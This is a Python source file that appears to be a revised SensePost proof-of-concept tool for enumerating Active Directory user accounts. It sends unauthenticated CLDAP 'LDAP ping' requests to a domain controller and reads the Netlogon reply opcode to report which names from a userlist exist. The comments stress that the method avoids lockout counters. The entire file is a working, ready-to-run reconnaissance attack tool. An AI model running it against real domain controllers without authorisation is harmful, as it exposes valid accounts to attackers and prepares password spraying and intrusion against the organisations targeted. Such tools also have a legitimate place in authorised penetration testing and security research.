#!/usr/bin/python2
#https://msdn.microsoft.com/en-us/library/cc223811.aspx
#https://github.com/samba-team/samba/blob/master/examples/misc/cldap.pl
#https://github.com/eerimoq/asn1tools/blob/master/tests/files/ietf/rfc4511.asn
from __future__ import print_function
from binascii import hexlify
import asn1tools
import socket
import sys
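# LDAP-ping (CLDAP over UDP/389) user enumeration.  Each probe is an
# unauthenticated searchRequest carrying DnsDomain/NtVer/User/AAC filters; the DC
# answers with a Netlogon blob whose opcode says whether the account exists.  No
# logon is attempted, so this should not touch bad-password/lockout counters
# (NOTE(review): inferred from the protocol, not verified against a DC).
#
# Because the transport is plain UDP, replies carry no integrity protection.  To
# limit false positives from stale or spoofed datagrams, every reply is matched on
# the DC's source address and on the LDAP messageID of the request it answers.

BANNER = "UserEnum LDAP Ping POC - Reino Mostert/SensePost 2018"

# Opcode at the start of a NETLOGON_SAM_LOGON_RESPONSE, the format the DC uses when
# NtVer requests NETLOGON_NT_VERSION_1 | NETLOGON_NT_VERSION_5 (see MS-ADTS 6.3.1):
# 19 (0x13) = LOGON_SAM_LOGON_RESPONSE, i.e. the account exists;
# 21 (0x15) = LOGON_SAM_USER_UNKNOWN.
# The original POC compared only the first byte with 19; the opcode is a
# little-endian USHORT, so both bytes are compared in parse_netlogon_opcode().
LOGON_SAM_LOGON_RESPONSE = 0x13
LOGON_SAM_USER_UNKNOWN = 0x15

LDAP_PORT = 389          # CLDAP port targeted by the original POC
RECV_TIMEOUT = 5.0       # seconds to wait for each reply (original: s.settimeout(5.0))
RECV_BUFSIZE = 65535     # a whole UDP datagram; the original's 1024 could truncate a reply

# LDAPMessage3 = searchRequest restricted to the shape of an LDAP ping.
SPECIFICATION = '''
Foo DEFINITIONS IMPLICIT TAGS ::= BEGIN
LDAPMessage3 ::= SEQUENCE {
messageID INTEGER,
protocolOp [APPLICATION 3] SEQUENCE {
baseObject OCTET STRING,
scope ENUMERATED {
baseObject (0),
singleLevel (1),
wholeSubtree (2),
...
},
derefAliases ENUMERATED {
neverDerefAliases (0),
derefInSearching (1),
derefFindingBaseObj (2),
derefAlways (3)
},
sizeLimit INTEGER,
timeLimit INTEGER,
typesOnly BOOLEAN,
filters [0] SEQUENCE {
filterDomain [3] SEQUENCE {
dnsdomattr OCTET STRING,
dnsdomval OCTET STRING
},
filterVersion [3] SEQUENCE {
ntverattr OCTET STRING,
ntverval OCTET STRING
},
filterUser [3] SEQUENCE {
userattr OCTET STRING,
userval OCTET STRING
},
filterAAC [3] SEQUENCE {
aacattr OCTET STRING,
aacval OCTET STRING
}
},
returntype SEQUENCE {
netlogon OCTET STRING
}
}
}
END
'''

# LDAPMessage4 = searchResultEntry carrying the single Netlogon attribute.
# LDAPMessage5 = searchResultDone; declared here but not decoded by this script
# (a reply holding only a searchResultDone ends up in the DecodeTagError branch).
RESPONSE_SPECIFICATION = '''
Bar DEFINITIONS IMPLICIT TAGS ::= BEGIN
LDAPMessage4 ::=
SEQUENCE
{
messageID INTEGER,
protocolOp [APPLICATION 4] SEQUENCE
{
objectName OCTET STRING,
attributes SEQUENCE
{
partialAttribute SEQUENCE
{
type OCTET STRING,
vals SET {
value OCTET STRING
}
}
}
}
}
LDAPMessage5 ::= SEQUENCE {
messageID INTEGER,
protocolOp [APPLICATION 5] SEQUENCE {
resultCode ENUMERATED {
success (0),
operationsError (1)
},
matchedDN OCTET STRING,
diagnosticMessage OCTET STRING
}
}
END
'''


def to_bytes(value):
    """Return `value` as bytes, UTF-8 encoding text; bytes pass through unchanged.

    Under Python 2 `bytes is str`, so plain str input is returned as is.
    """
    if isinstance(value, bytes):
        return value
    return value.encode('utf-8')


def build_ldap_ping_message(dns_domain, user, message_id):
    """Return the LDAPMessage3 dict (one CLDAP searchRequest) for an LDAP ping.

    dns_domain: DNS name of the domain (str or bytes), sent as the DnsDomain filter.
    user: account name to probe (str or bytes), sent as the User filter.
    message_id: LDAP messageID for this request; the DC echoes it in the reply,
        which is what lets recv_matching_reply() pair replies with requests.

    Every OCTET STRING value is bytes so the dict encodes under both Python 2
    and Python 3 (asn1tools will not accept text for OCTET STRING on Python 3).
    """
    filters = {
        # Must be the domain's DNS FQDN (e.g. Contoso.com); the usage hint in the
        # decode-error branch says a NetBIOS-style name leads to undecodable replies.
        'filterDomain': {'dnsdomattr': b'DnsDomain', 'dnsdomval': to_bytes(dns_domain)},
        # NtVer 0x00000003 = NETLOGON_NT_VERSION_1 | NETLOGON_NT_VERSION_5, selecting
        # the NETLOGON_SAM_LOGON_RESPONSE format whose opcode is checked in probe_user().
        'filterVersion': {'ntverattr': b'NtVer', 'ntverval': b'\x03\x00\x00\x00'},
        'filterUser': {'userattr': b'User', 'userval': to_bytes(user)},
        # AAC (AllowableAccountControlBits) = 0x10 exactly as the original POC sends it.
        # The DC matches it against the account's userAccountControl (MS-ADTS 6.3.3.2);
        # NOTE(review): confirm the intended semantics before changing it, since it
        # decides which accounts are reported as existing.
        'filterAAC': {'aacattr': b'AAC', 'aacval': b'\x10\x00\x00\x00'},
    }
    search_request = {
        'baseObject': b'',
        'scope': 'baseObject',
        'derefAliases': 'neverDerefAliases',
        'sizeLimit': 0,
        'timeLimit': 0,
        'typesOnly': False,
        'filters': filters,
        'returntype': {'netlogon': b'Netlogon'},
    }
    return {'messageID': message_id, 'protocolOp': search_request}


def parse_netlogon_opcode(netlogon):
    """Return the little-endian 16-bit opcode at the start of a Netlogon value.

    Accepts bytes, bytearray or a Python 2 str.  Returns None when the value is
    shorter than two bytes, so callers never index past the end of a short reply.
    """
    buf = bytearray(netlogon)
    if len(buf) < 2:
        return None
    return buf[0] | (buf[1] << 8)


def recv_matching_reply(sock, dc_addr, response_asn, message_id):
    """Receive datagrams until one from `dc_addr` answers request `message_id`.

    Returns the Netlogon attribute value (bytes-like) of that searchResultEntry.
    Datagrams from any other source address, and replies whose messageID does not
    match (late answers to an earlier probe), are reported and skipped instead of
    being attributed to the current user.

    Raises socket.timeout when nothing acceptable arrives within the socket timeout,
    and asn1tools' DecodeTagError when a datagram from the DC is not a searchResultEntry.
    """
    while True:
        reply, (src_ip, _src_port) = sock.recvfrom(RECV_BUFSIZE)
        if src_ip != dc_addr:
            print("[-] Ignoring datagram from unexpected source %s" % src_ip)
            continue
        decoded = response_asn.decode('LDAPMessage4', reply)
        if decoded['messageID'] != message_id:
            print("[-] Ignoring stale reply (messageID %s, expected %d)"
                  % (decoded['messageID'], message_id))
            continue
        return decoded['protocolOp']['attributes']['partialAttribute']['vals']['value']


def probe_user(sock, dc_addr, request_asn, response_asn, dns_domain, user, message_id):
    """Send one LDAP ping for `user` and print "[+] <user> exist" when the DC confirms it.

    Failures are printed per user and never abort the run, matching the original
    best-effort behaviour.
    """
    message = build_ldap_ping_message(dns_domain, user, message_id)
    encoded = request_asn.encode('LDAPMessage3', message)
    try:
        sock.sendto(encoded, (dc_addr, LDAP_PORT))
        netlogon = recv_matching_reply(sock, dc_addr, response_asn, message_id)
    except socket.timeout:
        print("[-] %s: no reply within %.0fs" % (user, RECV_TIMEOUT))
        return
    except asn1tools.codecs.DecodeTagError:
        # Presumably the DC answered with a searchResultDone only (no entry), which
        # the author observed for a non-FQDN domain name; hence the hint below.
        print('[-] Error in decoding packet. This sometimes happen if the wrong domain name has been supplied. Ensure that its the FQDN, e.g. Contoso.com, and not just Contoso.')
        return
    except socket.error as msg:
        print('[-] Error sending/receiving packets: ' + str(msg))
        return

    opcode = parse_netlogon_opcode(netlogon)
    if opcode == LOGON_SAM_LOGON_RESPONSE:
        print("[+] " + user + " exist")
    elif opcode != LOGON_SAM_USER_UNKNOWN:
        # Any other opcode (or a reply too short to carry one) is a format this
        # POC does not understand; say so rather than silently counting it as "absent".
        print("[-] %s: unexpected Netlogon opcode %r" % (user, opcode))


def main(argv):
    """Run the enumeration from the command line; returns the process exit status.

    argv: sys.argv-style list: script, DC IP/host, DNS domain name, userlist path.
    Returns 0 on completion, 1 on a usage, userlist or name-resolution error.
    """
    print(BANNER)
    if len(argv) != 4:
        print("Usage: python UserEnum_LDAP.py DomainControlerIP DNSDomainName Userlist")
        print("Example: python UserEnum_LDAP.py 192.168.1.10 Contoso.com userlist.txt")
        return 1  # the original exited 0 on a usage error, which hides failures in scripts
    dc_host, dns_domain, userlist_path = argv[1], argv[2], argv[3]

    request_asn = asn1tools.compile_string(SPECIFICATION, 'ber')
    response_asn = asn1tools.compile_string(RESPONSE_SPECIFICATION, 'ber')

    try:
        with open(userlist_path) as handle:
            # Strip trailing whitespace/newlines and skip blank lines, which the
            # original would have sent as a probe for the empty user name.
            usernames = [line.rstrip() for line in handle if line.rstrip()]
    except IOError as err:
        print("[-] Could not read userlist %s: %s" % (userlist_path, err))
        return 1

    try:
        # Resolve once so every reply can be checked against the DC's address.
        dc_addr = socket.gethostbyname(dc_host)
    except socket.error as err:
        print("[-] Could not resolve %s: %s" % (dc_host, err))
        return 1

    print("[*] Starting ...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(RECV_TIMEOUT)
    try:
        # messageIDs start at 1 and increase per probe so stale replies are detectable.
        for message_id, user in enumerate(usernames, 1):
            probe_user(sock, dc_addr, request_asn, response_asn, dns_domain, user, message_id)
    finally:
        sock.close()
    print("[*] Done ")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))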